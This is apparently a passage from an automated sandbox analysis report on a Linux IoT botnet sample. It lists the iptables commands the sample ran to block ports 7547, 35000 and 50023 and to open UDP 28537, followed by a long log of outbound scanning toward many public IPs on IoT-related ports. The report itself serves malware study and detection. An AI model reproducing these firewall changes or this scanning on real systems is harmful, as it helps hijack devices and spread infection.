Source: /bin/sh (PID: 4940)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4959)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4994)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5012)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5028)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5050)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5062)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5091)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5100)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5124)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5140)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5164)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5183)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5189)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5220)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5240)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5243)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5249)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5282)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5315)	Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT			Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52228 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49152 -> 52228
Source: unknown	Network traffic detected: HTTP traffic on port 37296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44712 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 7574 -> 44712
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 48440 -> 7574

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.20:40496 -> 110.240.138.18:5555
Source: global traffic	TCP traffic: 192.168.2.20:36358 -> 180.242.224.123:52869
Source: global traffic	TCP traffic: 192.168.2.20:37852 -> 194.120.187.83:8443
Source: global traffic	TCP traffic: 192.168.2.20:50052 -> 17.226.218.78:81
Source: global traffic	TCP traffic: 192.168.2.20:44934 -> 167.35.185.166:49152
Source: global traffic	TCP traffic: 192.168.2.20:35334 -> 185.252.99.21:5555
Source: global traffic	TCP traffic: 192.168.2.20:58744 -> 25.17.15.19:8443
Source: global traffic	TCP traffic: 192.168.2.20:41438 -> 126.140.98.187:81
Source: global traffic	TCP traffic: 192.168.2.20:39738 -> 17.103.148.14:8080
Source: global traffic	TCP traffic: 192.168.2.20:38150 -> 173.46.232.71:37215
Source: global traffic	TCP traffic: 192.168.2.20:50488 -> 9.23.193.235:5555
Source: global traffic	TCP traffic: 192.168.2.20:59326 -> 148.8.199.238:5555
Source: global traffic	TCP traffic: 192.168.2.20:45000 -> 191.194.67.143:8080
Source: global traffic	TCP traffic: 192.168.2.20:56584 -> 191.19.130.89:5555
Source: global traffic	TCP traffic: 192.168.2.20:49578 -> 174.116.188.92:8080
Source: global traffic	TCP traffic: 192.168.2.20:54756 -> 60.49.142.109:5555
Source: global traffic	TCP traffic: 192.168.2.20:56542 -> 115.153.49.223:5555
Source: global traffic	TCP traffic: 192.168.2.20:46172 -> 175.130.144.51:52869
Source: global traffic	TCP traffic: 192.168.2.20:36110 -> 199.129.123.23:7574
Source: global traffic	TCP traffic: 192.168.2.20:33170 -> 194.70.177.118:8080
Source: global traffic	TCP traffic: 192.168.2.20:60986 -> 75.245.97.93:8443
Source: global traffic	TCP traffic: 192.168.2.20:59670 -> 76.4.181.236:81
Source: global traffic	TCP traffic: 192.168.2.20:56552 -> 89.135.205.190:8080
Source: global traffic	TCP traffic: 192.168.2.20:37612 -> 187.136.236.154:81
Source: global traffic	TCP traffic: 192.168.2.20:60946 -> 153.172.56.219:7574
Source: global traffic	TCP traffic: 192.168.2.20:38364 -> 187.68.238.155:49152
Source: global traffic	TCP traffic: 192.168.2.20:37458 -> 82.90.22.100:8443
Source: global traffic	TCP traffic: 192.168.2.20:45216 -> 105.46.196.121:5555
Source: global traffic	TCP traffic: 192.168.2.20:55078 -> 101.207.79.110:8080
Source: global traffic	TCP traffic: 192.168.2.20:56816 -> 152.131.171.80:81
Source: global traffic	TCP traffic: 192.168.2.20:38788 -> 39.230.188.152:8080
Source: global traffic	TCP traffic: 192.168.2.20:59782 -> 108.180.252.214:37215
Source: global traffic	TCP traffic: 192.168.2.20:39398 -> 146.171.127.198:7574
Source: global traffic	TCP traffic: 192.168.2.20:44620 -> 98.101.186.102:8080
Source: global traffic	TCP traffic: 192.168.2.20:46166 -> 89.54.32.71:8080
Source: global traffic	TCP traffic: 192.168.2.20:55236 -> 97.19.237.236:52869
Source: global traffic	TCP traffic: 192.168.2.20:52260 -> 139.115.248.246:7574
Source: global traffic	TCP traffic: 192.168.2.20:48110 -> 59.115.70.23:81
Source: global traffic	TCP traffic: 192.168.2.20:37350 -> 74.164.61.210:8080
Source: global traffic	TCP traffic: 192.168.2.20:38834 -> 101.154.10.135:5555
Source: global traffic	TCP traffic: 192.168.2.20:44004 -> 48.190.253.52:5555
Source: global traffic	TCP traffic: 192.168.2.20:34860 -> 100.52.110.183:81
Source: global traffic	TCP traffic: 192.168.2.20:50258 -> 195.10.66.60:7574
Source: global traffic	TCP traffic: 192.168.2.20:44108 -> 45.90.39.155:52869
Source: global traffic	TCP traffic: 192.168.2.20:39696 -> 16.78.38.159:5555
Source: global traffic	TCP traffic: 192.168.2.20:53944 -> 17.145.188.167:8080
Source: global traffic	TCP traffic: 192.168.2.20:37114 -> 116.18.170.242:8080
Source: global traffic	TCP traffic: 192.168.2.20:59380 -> 113.9.130.10:37215
Source: global traffic	TCP traffic: 192.168.2.20:43220 -> 120.130.230.100:8443
Source: global traffic	TCP traffic: 192.168.2.20:55000 -> 157.11.78.115:52869
Source: global traffic	TCP traffic: 192.168.2.20:42738 -> 160.179.191.126:8080
Source: global traffic	TCP traffic: 192.168.2.20:47834 -> 191.114.3.228:8080
Source: global traffic	TCP traffic: 192.168.2.20:40026 -> 22.151.58.160:8080
Source: global traffic	TCP traffic: 192.168.2.20:51908 -> 101.13.186.3:37215
Source: global traffic	TCP traffic: 192.168.2.20:40946 -> 12.216.98.131:5555
Source: global traffic	TCP traffic: 192.168.2.20:43972 -> 121.95.250.247:8080
Source: global traffic	TCP traffic: 192.168.2.20:40778 -> 40.55.32.94:81
Source: global traffic	TCP traffic: 192.168.2.20:38816 -> 49.96.132.149:5555
Source: global traffic	TCP traffic: 192.168.2.20:44022 -> 20.125.190.187:49152
Source: global traffic	TCP traffic: 192.168.2.20:33334 -> 16.141.242.228:8080
Source: global traffic	TCP traffic: 192.168.2.20:44174 -> 62.250.85.170:5555
Source: global traffic	TCP traffic: 192.168.2.20:55818 -> 86.118.67.217:37215
Source: global traffic	TCP traffic: 192.168.2.20:57082 -> 139.232.194.9:7574
Source: global traffic	TCP traffic: 192.168.2.20:60086 -> 91.81.75.27:8443
Source: global traffic	TCP traffic: 192.168.2.20:46392 -> 136.183.108.224:52869
Source: global traffic	TCP traffic: 192.168.2.20:51792 -> 128.138.242.245:8443
Source: global traffic	TCP traffic: 192.168.2.20:33586 -> 145.160.209.254:5555
Source: global traffic	TCP traffic: 192.168.2.20:55430 -> 52.161.190.104:49152
Source: global traffic	TCP traffic: 192.168.2.20:39778 -> 85.121.215.74:8443
Source: global traffic	TCP traffic: 192.168.2.20:32806 -> 94.97.187.163:52869
Source: global traffic	TCP traffic: 192.168.2.20:51512 -> 201.243.109.202:8080
Source: global traffic	TCP traffic: 192.168.2.20:33938 -> 221.1.41.110:52869
Source: global traffic	TCP traffic: 192.168.2.20:57690 -> 149.104.161.39:8080
Source: global traffic	TCP traffic: 192.168.2.20:35422 -> 123.216.91.122:8443
Source: global traffic	TCP traffic: 192.168.2.20:49614 -> 4.118.127.11:8080
Source: global traffic	TCP traffic: 192.168.2.20:50850 -> 202.59.10.109:8443
Source: global traffic	TCP traffic: 192.168.2.20:45574 -> 92.184.72.221:7574
Source: global traffic	TCP traffic: 192.168.2.20:47266 -> 49.44.85.85:5555
Source: global traffic	TCP traffic: 192.168.2.20:52438 -> 167.1.169.103:37215
Source: global traffic	TCP traffic: 192.168.2.20:59122 -> 42.11.46.133:52869
Source: global traffic	TCP traffic: 192.168.2.20:34604 -> 118.173.235.22:8443
Source: global traffic	TCP traffic: 192.168.2.20:33216 -> 37.63.64.215:37215
Source: global traffic	TCP traffic: 192.168.2.20:50252 -> 19.205.39.28:8080
Source: global traffic	TCP traffic: 192.168.2.20:35820 -> 48.202.182.121:8080
Source: global traffic	TCP traffic: 192.168.2.20:53032 -> 24.173.205.153:8080
Source: global traffic	TCP traffic: 192.168.2.20:49528 -> 197.64.140.241:52869
Source: global traffic	TCP traffic: 192.168.2.20:54652 -> 189.161.71.91:52869
Source: global traffic	TCP traffic: 192.168.2.20:60480 -> 57.99.254.174:8080
Source: global traffic	TCP traffic: 192.168.2.20:35530 -> 4.22.190.7:81
Source: global traffic	TCP traffic: 192.168.2.20:33072 -> 184.71.180.110:49152
Source: global traffic	TCP traffic: 192.168.2.20:59348 -> 13.78.136.158:81
Source: global traffic	TCP traffic: 192.168.2.20:45142 -> 47.130.183.87:49152
Source: global traffic	TCP traffic: 192.168.2.20:42122 -> 133.34.124.224:7574
Source: global traffic	TCP traffic: 192.168.2.20:59514 -> 153.249.92.103:7574
Source: global traffic	TCP traffic: 192.168.2.20:52342 -> 98.63.16.128:7574
Source: global traffic	TCP traffic: 192.168.2.20:36338 -> 38.208.250.246:8080
Source: global traffic	TCP traffic: 192.168.2.20:56992 -> 214.89.182.196:8080
Source: global traffic	TCP traffic: 192.168.2.20:35682 -> 197.182.45.71:5555
Source: global traffic	TCP traffic: 192.168.2.20:34526 -> 135.37.73.197:52869
Source: global traffic	TCP traffic: 192.168.2.20:52478 -> 80.157.104.83:8443
Source: global traffic	TCP traffic: 192.168.2.20:39924 -> 106.61.88.206:52869
Source: global traffic	TCP traffic: 192.168.2.20:42408 -> 154.170.107.231:8080
Source: global traffic	TCP traffic: 192.168.2.20:48578 -> 218.244.38.188:7574
Source: global traffic	TCP traffic: 192.168.2.20:38690 -> 61.94.47.96:49152
Source: global traffic	TCP traffic: 192.168.2.20:41048 -> 27.134.142.192:7574
Source: global traffic	TCP traffic: 192.168.2.20:58762 -> 166.134.109.188:37215
Source: global traffic	TCP traffic: 192.168.2.20:59340 -> 49.129.128.6:5555
Source: global traffic	TCP traffic: 192.168.2.20:40468 -> 175.9.24.199:8080
Source: global traffic	TCP traffic: 192.168.2.20:40042 -> 84.209.208.168:52869
Source: global traffic	TCP traffic: 192.168.2.20:58356 -> 68.227.44.217:52869
Source: global traffic	TCP traffic: 192.168.2.20:53628 -> 211.55.43.132:7574
Source: global traffic	TCP traffic: 192.168.2.20:57586 -> 195.172.223.126:8080
Source: global traffic	TCP traffic: 192.168.2.20:56526 -> 96.203.33.213:52869
Source: global traffic	TCP traffic: 192.168.2.20:54568 -> 129.20.227.135:7574
Source: global traffic	TCP traffic: 192.168.2.20:55468 -> 9.172.203.181:8080
Source: global traffic	TCP traffic: 192.168.2.20:36304 -> 94.224.106.104:49152
Source: global traffic	TCP traffic: 192.168.2.20:40782 -> 120.118.238.58:52869
Source: global traffic	TCP traffic: 192.168.2.20:35460 -> 91.179.250.42:49152
Source: global traffic	TCP traffic: 192.168.2.20:36004 -> 52.199.115.5:37215
Source: global traffic	TCP traffic: 192.168.2.20:41788 -> 66.11.10.33:49152
Source: global traffic	TCP traffic: 192.168.2.20:47030 -> 72.17.101.201:49152
Source: global traffic	TCP traffic: 192.168.2.20:36790 -> 75.11.174.122:8080
Source: global traffic	TCP traffic: 192.168.2.20:56684 -> 35.24.18.228:81
Source: global traffic	TCP traffic: 192.168.2.20:48792 -> 158.130.59.239:8080
Source: global traffic	TCP traffic: 192.168.2.20:40750 -> 112.2.90.90:49152
Source: global traffic	TCP traffic: 192.168.2.20:48980 -> 20.108.48.51:81
Source: global traffic	TCP traffic: 192.168.2.20:46626 -> 180.248.40.176:8080
Source: global traffic	TCP traffic: 192.168.2.20:39450 -> 83.210.199.93:8080
Source: global traffic	TCP traffic: 192.168.2.20:37570 -> 216.75.1.172:8080
Source: global traffic	TCP traffic: 192.168.2.20:57302 -> 154.75.144.11:37215
Source: global traffic	TCP traffic: 192.168.2.20:52330 -> 14.129.240.17:8080
Source: global traffic	TCP traffic: 192.168.2.20:55278 -> 37.62.41.226:8443
Source: global traffic	TCP traffic: 192.168.2.20:43200 -> 179.94.238.196:7574
Source: global traffic	TCP traffic: 192.168.2.20:57864 -> 33.158.63.251:8080
Source: global traffic	TCP traffic: 192.168.2.20:43228 -> 7.63.132.107:8080
Source: global traffic	TCP traffic: 192.168.2.20:57072 -> 99.187.208.35:8443
Source: global traffic	TCP traffic: 192.168.2.20:57792 -> 157.2.211.116:81
Source: global traffic	TCP traffic: 192.168.2.20:38030 -> 217.200.122.135:37215
Source: global traffic	TCP traffic: 192.168.2.20:56166 -> 219.46.197.199:8080
Source: global traffic	TCP traffic: 192.168.2.20:51372 -> 122.169.104.138:52869
Source: global traffic	TCP traffic: 192.168.2.20:60240 -> 164.100.107.31:81
Source: global traffic	TCP traffic: 192.168.2.20:45086 -> 96.118.108.130:81
Source: global traffic	TCP traffic: 192.168.2.20:53842 -> 220.75.159.53:81
Source: global traffic	TCP traffic: 192.168.2.20:48484 -> 218.93.19.234:49152
Source: global traffic	TCP traffic: 192.168.2.20:50000 -> 63.51.68.64:81
Source: global traffic	TCP traffic: 192.168.2.20:58058 -> 54.218.19.80:49152
Source: global traffic	TCP traffic: 192.168.2.20:51238 -> 59.218.244.213:8080
Source: global traffic	TCP traffic: 192.168.2.20:42194 -> 216.31.211.143:81
Source: global traffic	TCP traffic: 192.168.2.20:47668 -> 205.119.84.12:8080
Source: global traffic	TCP traffic: 192.168.2.20:48774 -> 146.210.131.27:37215
Source: global traffic	TCP traffic: 192.168.2.20:35780 -> 161.92.112.229:8080
Source: global traffic	TCP traffic: 192.168.2.20:34480 -> 111.212.139.145:8080
Source: global traffic	TCP traffic: 192.168.2.20:45426 -> 116.209.97.113:5555
Source: global traffic	TCP traffic: 192.168.2.20:51670 -> 146.164.113.65:52869
Source: global traffic	TCP traffic: 192.168.2.20:57216 -> 170.57.251.41:7574
Source: global traffic	TCP traffic: 192.168.2.20:60326 -> 46.131.230.49:8080
Source: global traffic	TCP traffic: 192.168.2.20:47292 -> 52.40.220.98:8080
Source: global traffic	TCP traffic: 192.168.2.20:42282 -> 133.90.62.93:52869
Source: global traffic	TCP traffic: 192.168.2.20:46356 -> 219.223.139.134:81
Source: global traffic	TCP traffic: 192.168.2.20:58656 -> 116.71.182.71:81
Source: global traffic	TCP traffic: 192.168.2.20:52016 -> 51.91.73.59:5555
Source: global traffic	TCP traffic: 192.168.2.20:60694 -> 14.52.177.146:49152
Source: global traffic	TCP traffic: 192.168.2.20:48610 -> 174.97.64.130:37215
Source: global traffic	TCP traffic: 192.168.2.20:36540 -> 84.72.187.149:37215
Source: global traffic	TCP traffic: 192.168.2.20:44250 -> 42.108.198.1:8080
Source: global traffic	TCP traffic: 192.168.2.20:44818 -> 7.251.184.10:49152
Source: global traffic	TCP traffic: 192.168.2.20:58920 -> 133.216.170.67:49152
Source: global traffic	TCP traffic: 192.168.2.20:52980 -> 135.228.27.91:5555
Source: global traffic	TCP traffic: 192.168.2.20:46192 -> 33.106.54.104:8080
Source: global traffic	TCP traffic: 192.168.2.20:54258 -> 191.217.221.203:7574
Source: global traffic	TCP traffic: 192.168.2.20:46038 -> 186.220.27.206:5555
Source: global traffic	TCP traffic: 192.168.2.20:49494 -> 48.58.5.136:7574
Source: global traffic	TCP traffic: 192.168.2.20:33494 -> 161.22.129.249:8080
Source: global traffic	TCP traffic: 192.168.2.20:34602 -> 189.49.236.220:8080
Source: global traffic	TCP traffic: 192.168.2.20:53052 -> 61.64.2.50:7574
Source: global traffic	TCP traffic: 192.168.2.20:50894 -> 97.6.36.159:8080
Source: global traffic	TCP traffic: 192.168.2.20:34592 -> 90.210.159.184:8080
Source: global traffic	TCP traffic: 192.168.2.20:35328 -> 117.12.79.28:49152
Source: global traffic	TCP traffic: 192.168.2.20:48168 -> 64.189.158.197:5555
Source: global traffic	TCP traffic: 192.168.2.20:55834 -> 27.122.236.15:7574
Source: global traffic	TCP traffic: 192.168.2.20:50506 -> 59.58.132.156:49152
Source: global traffic	TCP traffic: 192.168.2.20:34416 -> 65.247.63.177:81
Source: global traffic	TCP traffic: 192.168.2.20:35144 -> 135.143.229.69:7574
Source: global traffic	TCP traffic: 192.168.2.20:38000 -> 160.87.228.46:5555
Source: global traffic	TCP traffic: 192.168.2.20:55078 -> 68.152.79.70:8443
Source: global traffic	TCP traffic: 192.168.2.20:59972 -> 66.137.83.50:81
Source: global traffic	TCP traffic: 192.168.2.20:35398 -> 82.75.189.190:81
Source: global traffic	TCP traffic: 192.168.2.20:45164 -> 120.210.115.227:8080
Source: global traffic	TCP traffic: 192.168.2.20:52704 -> 156.94.186.125:8080
Source: global traffic	TCP traffic: 192.168.2.20:40054 -> 119.91.50.120:49152
Source: global traffic	TCP traffic: 192.168.2.20:53006 -> 205.210.8.73:52869
Source: global traffic	TCP traffic: 192.168.2.20:33180 -> 213.122.86.91:5555
Source: global traffic	TCP traffic: 192.168.2.20:51986 -> 12.241.220.138:37215
Source: global traffic	TCP traffic: 192.168.2.20:34178 -> 130.177.18.137:49152
Source: global traffic	TCP traffic: 192.168.2.20:41608 -> 4.245.217.94:8080
Source: global traffic	TCP traffic: 192.168.2.20:53206 -> 78.8.77.51:5555
Source: global traffic	TCP traffic: 192.168.2.20:59996 -> 150.45.123.229:49152
Source: global traffic	TCP traffic: 192.168.2.20:47406 -> 177.234.114.180:49152
Source: global traffic	TCP traffic: 192.168.2.20:44532 -> 219.216.64.252:5555
Source: global traffic	TCP traffic: 192.168.2.20:50594 -> 43.185.95.93:8080
Source: global traffic	TCP traffic: 192.168.2.20:45948 -> 116.177.55.129:52869
Source: global traffic	TCP traffic: 192.168.2.20:42988 -> 161.29.217.202:37215
Source: global traffic	TCP traffic: 192.168.2.20:60076 -> 161.60.53.154:8080
Source: global traffic	TCP traffic: 192.168.2.20:42918 -> 17.73.96.41:81
Source: global traffic	TCP traffic: 192.168.2.20:47268 -> 197.75.185.233:49152
Source: global traffic	TCP traffic: 192.168.2.20:57620 -> 81.37.238.179:8080
Source: global traffic	TCP traffic: 192.168.2.20:35414 -> 31.201.252.70:7574
Source: global traffic	TCP traffic: 192.168.2.20:58802 -> 22.231.115.48:5555
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 14.68.118.231:1023
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 164.148.132.78:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 153.183.139.146:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 5.161.45.2:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 122.34.192.0:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 168.48.143.171:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 135.183.180.114:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 48.151.83.184:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 194.179.4.211:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 221.132.106.104:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 170.186.136.235:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 85.192.60.167:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 107.69.230.46:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 75.62.125.164:1023
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 171.82.43.233:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 216.182.36.114:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 185.161.152.189:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 174.34.205.52:1023
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 70.236.96.255:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 84.66.149.132:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 179.115.125.39:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 61.166.150.169:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 116.107.255.254:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 180.169.240.184:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 217.22.202.14:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 98.25.246.58:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 114.53.240.254:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 117.61.145.5:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 84.99.185.217:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 194.166.99.241:1023
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 145.109.18.28:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 188.17.32.76:2323
Source: global traffic	TCP traffic: 192.168.2.20:45090 -> 169.184.176.176:2323
Source: global traffic	TCP traffic: 192.168.2.20:56066 -> 206.79.214.122:52869
Source: global traffic	TCP traffic: 192.168.2.20:48224 -> 139.43.104.61:37215
Source: global traffic	TCP traffic: 192.168.2.20:38472 -> 143.110.90.125:8080
Source: global traffic	TCP traffic: 192.168.2.20:43146 -> 132.178.20.58:81
Source: global traffic	TCP traffic: 192.168.2.20:60132 -> 164.87.95.100:8443
Source: global traffic	TCP traffic: 192.168.2.20:55710 -> 148.162.250.199:37215
Source: global traffic	TCP traffic: 192.168.2.20:49514 -> 98.82.199.19:8443
Source: global traffic	TCP traffic: 192.168.2.20:41472 -> 132.39.112.185:8080
Source: global traffic	TCP traffic: 192.168.2.20:60782 -> 2.84.46.201:81
Source: global traffic	TCP traffic: 192.168.2.20:44208 -> 139.163.247.157:8080
Source: global traffic	TCP traffic: 192.168.2.20:59058 -> 169.40.8.89:5555
Source: global traffic	TCP traffic: 192.168.2.20:51074 -> 120.150.59.17:8080
Source: global traffic	TCP traffic: 192.168.2.20:55842 -> 222.77.219.12:5555
Source: global traffic	TCP traffic: 192.168.2.20:51944 -> 98.19.32.16:8080
Source: global traffic	TCP traffic: 192.168.2.20:56180 -> 100.146.200.249:5555
Source: global traffic	TCP traffic: 192.168.2.20:42634 -> 151.37.83.166:37215
Source: global traffic	TCP traffic: 192.168.2.20:59772 -> 183.247.235.167:5555
Source: global traffic	TCP traffic: 192.168.2.20:59266 -> 201.211.65.138:52869
Source: global traffic	TCP traffic: 192.168.2.20:56382 -> 117.250.174.17:8080
Source: global traffic	TCP traffic: 192.168.2.20:37006 -> 20.4.186.191:8080
Source: global traffic	TCP traffic: 192.168.2.20:54738 -> 49.216.4.117:8080
Source: global traffic	TCP traffic: 192.168.2.20:49914 -> 217.107.92.58:5555
Source: global traffic	TCP traffic: 192.168.2.20:45968 -> 209.91.223.5:49152
Source: global traffic	TCP traffic: 192.168.2.20:58442 -> 133.150.36.64:81
Source: global traffic	TCP traffic: 192.168.2.20:40466 -> 11.10.40.243:8080
Source: global traffic	TCP traffic: 192.168.2.20:41956 -> 220.206.246.179:49152
Source: global traffic	TCP traffic: 192.168.2.20:55878 -> 141.121.59.188:8080
Source: global traffic	TCP traffic: 192.168.2.20:59474 -> 206.169.28.179:8443
Source: global traffic	TCP traffic: 192.168.2.20:45706 -> 24.132.250.120:37215
Source: global traffic	TCP traffic: 192.168.2.20:59976 -> 18.193.82.36:8080
Source: global traffic	TCP traffic: 192.168.2.20:34368 -> 114.8.59.239:8080
Source: global traffic	TCP traffic: 192.168.2.20:49544 -> 71.213.157.134:49152
Source: global traffic	TCP traffic: 192.168.2.20:60940 -> 80.201.9.77:49152
Source: global traffic	TCP traffic: 192.168.2.20:49528 -> 121.98.76.63:37215
Source: global traffic	TCP traffic: 192.168.2.20:32942 -> 14.27.161.132:37215
Source: global traffic	TCP traffic: 192.168.2.20:34198 -> 54.52.13.202:8080
Source: global traffic	TCP traffic: 192.168.2.20:45138 -> 15.53.225.155:7574
Source: global traffic	TCP traffic: 192.168.2.20:50864 -> 133.38.31.193:8080
Source: global traffic	TCP traffic: 192.168.2.20:58466 -> 49.218.119.115:81
Source: global traffic	TCP traffic: 192.168.2.20:35636 -> 103.74.156.80:8080
Source: global traffic	TCP traffic: 192.168.2.20:52908 -> 2.129.77.75:8080
Source: global traffic	TCP traffic: 192.168.2.20:56384 -> 177.203.133.112:5555
Source: global traffic	TCP traffic: 192.168.2.20:51268 -> 34.79.180.38:37215
Source: global traffic	TCP traffic: 192.168.2.20:34662 -> 19.128.141.198:81
Source: global traffic	TCP traffic: 192.168.2.20:48620 -> 185.61.14.146:37215
Source: global traffic	TCP traffic: 192.168.2.20:53884 -> 39.192.165.164:49152
Source: global traffic	TCP traffic: 192.168.2.20:56672 -> 104.94.125.179:8080
Source: global traffic	TCP traffic: 192.168.2.20:38274 -> 124.57.207.32:8443
Source: global traffic	TCP traffic: 192.168.2.20:54200 -> 76.94.216.22:37215
Source: global traffic	TCP traffic: 192.168.2.20:47530 -> 194.82.200.72:37215
Source: global traffic	TCP traffic: 192.168.2.20:43750 -> 100.166.22.71:8080
Source: global traffic	TCP traffic: 192.168.2.20:46322 -> 108.232.119.42:52869
Source: global traffic	TCP traffic: 192.168.2.20:42048 -> 19.63.161.92:7574
Source: global traffic	TCP traffic: 192.168.2.20:60118 -> 140.201.154.174:5555
Source: global traffic	TCP traffic: 192.168.2.20:42312 -> 202.47.233.125:52869
Source: global traffic	TCP traffic: 192.168.2.20:50440 -> 163.252.150.224:49152
Source: global traffic	TCP traffic: 192.168.2.20:42798 -> 47.205.159.249:49152
Source: global traffic	TCP traffic: 192.168.2.20:33812 -> 97.79.190.46:8080
Source: global traffic	TCP traffic: 192.168.2.20:47742 -> 193.229.210.90:52869
Source: global traffic	TCP traffic: 192.168.2.20:40988 -> 165.123.198.53:81
Source: global traffic	TCP traffic: 192.168.2.20:39100 -> 178.232.217.232:52869
Source: global traffic	TCP traffic: 192.168.2.20:34048 -> 189.144.128.178:5555
Source: global traffic	TCP traffic: 192.168.2.20:46030 -> 137.189.214.33:8443
Source: global traffic	TCP traffic: 192.168.2.20:45134 -> 120.166.53.75:7574
Source: global traffic	TCP traffic: 192.168.2.20:58870 -> 188.36.241.166:81
